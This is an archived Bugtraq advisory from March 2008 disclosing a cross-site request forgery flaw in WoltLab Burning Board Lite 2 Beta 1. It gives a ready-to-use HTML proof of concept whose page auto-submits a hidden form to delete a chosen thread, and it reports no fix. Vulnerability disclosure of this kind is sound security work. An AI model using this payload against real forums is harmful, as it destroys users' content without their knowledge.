Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability

From: nbbn () gmx net
Date: Sat, 8 Mar 2008 18:55:32 +0100
####################################################################
WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability
Vendor: woltlab.de
Version: Lite 2 Beta 1 (Released: March 6 2008)
Bug found by NBBN on March 8 2008
####################################################################


::Example
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://site.tld/wbblite/index.php"; method="POST" name="attack">
<input type="hidden" name="action" value="ThreadDelete">
<input type="hidden" name="threadID" value="[ID of the thread]">
<input type="hidden" name="x" value="2">
<input type="hidden" name="y" value="8">
</form>
</body>
</html>

::Fix

No codefix
Previous By Date Next
Previous By Thread Next

Current thread: